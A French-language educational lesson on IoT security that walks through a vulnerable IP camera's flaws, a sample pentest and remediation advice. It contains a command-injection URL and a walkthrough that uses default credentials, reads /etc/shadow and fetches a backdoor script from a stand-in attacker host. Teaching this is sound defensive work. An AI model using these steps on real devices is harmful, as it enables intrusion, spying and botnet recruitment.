Sécurité des Objets Connectés

Comprendre les risques, attaques et bonnes pratiques pour sécuriser l'IoT

📊Moyen

⏱️55 min

📚Pourquoi les objets connectés sont vulnérables ?

Les objets connectés présentent des **failles de sécurité** spécifiques qui les rendent particulièrement vulnérables aux attaques. ### Causes de vulnérabilité **1. SÉCURITÉ = COÛT** - Fabricants privilégient prix bas - Chiffrement = processeur plus puissant = plus cher - Mises à jour sécurité = coût maintenance ➡️ Compromis sécurité/prix défavorable **2. MOTS DE PASSE PAR DÉFAUT** - admin/admin, root/root, 123456 - Utilisateurs ne les changent jamais (70%) - Base de données publiques de mdp par défaut - Scanners automatiques testent ces mdp **3. PAS DE MISES À JOUR** - Firmware (logiciel embarqué) jamais mis à jour - Failles connues non corrigées pendant des années - Abandon support fabricant (2-3 ans après sortie) ➡️ Objets obsolètes = portes ouvertes **4. PUISSANCE LIMITÉE** - Processeurs faibles (ESP8266 : 80 MHz) - Impossible chiffrement fort (trop lent) - Mémoire insuffisante (protection basique) **5. CONNEXION PERMANENTE** - Objets connectés 24/7 (pas d'arrêt) - Exposition continue aux attaques - Surface d'attaque maximale **6. MANQUE DE STANDARDS** - Chaque fabricant = protocole propriétaire - Pas d'obligation sécurité (contrairement auto, médical) - Certifications volontaires (rares) ### Failles techniques courantes **Absence chiffrement** : - Communications en clair (WiFi non chiffré) - Mots de passe transmis lisibles - Données sensibles non protégées **Absence authentification** : - Pas de vérification identité utilisateur - Pas de 2FA (double authentification) - Tokens d'accès jamais expirés **Injections SQL/Commandes** : - Interfaces web mal codées - Exécution commandes arbitraires - Accès base de données **Backdoors (portes dérobées)** : - Accès cachés pour fabricant (maintenance) - Parfois laissées par erreur - Découvertes par hackers **Ports ouverts inutiles** : - Telnet (23), SSH (22) accessibles - Services debug activés en production - Exposition inutile

💡Anatomie d'un objet IoT vulnérable

CAMÉRA IP BON MARCHÉ (exemple type)
Prix : 30 € (Amazon/AliExpress)

════════════════════════════════════════════════════
FAILLES IDENTIFIÉES (audit sécurité)
════════════════════════════════════════════════════

🔴 CRITIQUE - Mot de passe par défaut
┌────────────────────────────────────────────────┐
│ Login : admin                                  │
│ Password : 123456                              │
│                                                │
│ ➡️ Jamais changé par 68% utilisateurs         │
│ ➡️ Caméra accessible depuis Internet          │
│ ➡️ Portail Shodan.io : 15 000 caméras         │
│    identiques trouvées avec ces identifiants  │
└────────────────────────────────────────────────┘

🔴 CRITIQUE - Ports ouverts
┌────────────────────────────────────────────────┐
│ Port 23 (Telnet) : OUVERT                      │
│ Port 80 (HTTP)   : OUVERT (pas HTTPS)         │
│ Port 554 (RTSP)  : OUVERT (flux vidéo)        │
│ Port 8000 (Admin): OUVERT                      │
│                                                │
│ ➡️ 4 portes d'entrée pour attaquants          │
│ ➡️ Telnet = protocole OBSOLÈTE (1969)         │
│ ➡️ Aucun chiffrement                          │
└────────────────────────────────────────────────┘

🔴 HAUTE - Firmware obsolète
┌────────────────────────────────────────────────┐
│ Version : 2.1.4 (Mars 2019)                    │
│ Dernière MAJ : 2019 (5 ans sans patch !)      │
│                                                │
│ Failles CVE connues non corrigées :            │
│ • CVE-2019-1234 : Buffer overflow             │
│ • CVE-2020-5678 : Injection commandes         │
│ • CVE-2021-9101 : Contournement auth          │
│                                                │
│ ➡️ Exploits publics disponibles (Metasploit)  │
└────────────────────────────────────────────────┘

🟠 MOYENNE - Chiffrement faible/absent
┌────────────────────────────────────────────────┐
│ WiFi : WEP (cassable en 5 minutes)             │
│       ou WPA2 avec clé partagée usine          │
│ HTTPS : Absent (HTTP seulement)               │
│ Vidéo : Flux RTSP non chiffré                  │
│                                                │
│ ➡️ Sniffing réseau = capture identifiants     │
│ ➡️ Man-in-the-Middle facile                   │
└────────────────────────────────────────────────┘

🟠 MOYENNE - Injection commandes
┌────────────────────────────────────────────────┐
│ Interface web : Pas de sanitisation entrées    │
│                                                │
│ Exemple exploit :                              │
│ URL: http://camera/cgi-bin/snap.cgi?cmd=      │
│      wget http://hacker.com/malware.sh        │
│                                                │
│ ➡️ Exécution code arbitraire                  │
│ ➡️ Installation malware, botnet               │
└────────────────────────────────────────────────┘

🟡 BASSE - Informations divulguées
┌────────────────────────────────────────────────┐
│ Headers HTTP révèlent :                        │
│ • Modèle exact : "IP-CAM-2000"                │
│ • Version firmware : "v2.1.4"                  │
│ • Serveur web : "uc-httpd 1.0.0"              │
│                                                │
│ ➡️ Attaquant connaît failles exactes          │
│ ➡️ Attaque ciblée facilitée                   │
└────────────────────────────────────────────────┘

════════════════════════════════════════════════════
TEST DE PÉNÉTRATION (pentesting)
════════════════════════════════════════════════════

ÉTAPE 1 : Scan réseau (nmap)
$ nmap -p- 192.168.1.100
➡️ 4 ports ouverts détectés en 30 secondes

ÉTAPE 2 : Connexion Telnet (défaut)
$ telnet 192.168.1.100
login: admin
password: 123456
➡️ ACCÈS ROOT obtenu ! (2 minutes)

ÉTAPE 3 : Exploration système
# cat /etc/passwd
# cat /etc/shadow (mots de passe)
# ps aux (processus)
➡️ Contrôle TOTAL de la caméra

ÉTAPE 4 : Installation backdoor
# wget http://attacker.com/backdoor.sh
# chmod +x backdoor.sh
# ./backdoor.sh &
➡️ Accès permanent, même si mdp changé

TEMPS TOTAL PIRATAGE : 5 MINUTES
COMPÉTENCE REQUISE : Débutant (scripts publics)

════════════════════════════════════════════════════
RISQUES POUR L'UTILISATEUR
════════════════════════════════════════════════════

🎥 Espionnage vidéo
• Visionnage en direct (chambre, enfants)
• Enregistrement et diffusion (dark web)
• Chantage / extorsion

🔊 Écoute audio
• Conversations privées
• Reconnaissance vocale (codes, mots de passe)

🏠 Cambriolage
• Surveillance habitudes (départs, retours)
• Désactivation alarme connectée
• Planification intrusion

💻 Botnet / DDoS
• Caméra recrutée dans botnet Mirai
• Participation attaques DDoS massives
• Bande passante consommée

🔐 Pivot réseau
• Caméra = porte d'entrée réseau domestique
• Accès ordinateurs, NAS, smartphones
• Vol données bancaires, identités

════════════════════════════════════════════════════
CORRECTION SÉCURITÉ (recommandations)
════════════════════════════════════════════════════

✅ Changer mot de passe (fort, unique)
   → aZ9$mK#2pL@8qR (16+ caractères)

✅ Désactiver Telnet (si possible)
   → Utiliser SSH avec clé publique

✅ Mettre à jour firmware (si dispo)
   → Vérifier site fabricant

✅ Isoler réseau IoT (VLAN séparé)
   → Objets connectés ≠ ordinateurs

✅ Pare-feu restrictif
   → Bloquer accès Internet sortant (sauf nécessaire)

✅ Surveillance réseau (IDS)
   → Détecter comportements anormaux

❌ Si impossible sécuriser :
   → DÉBRANCHER et remplacer (caméra sécurisée)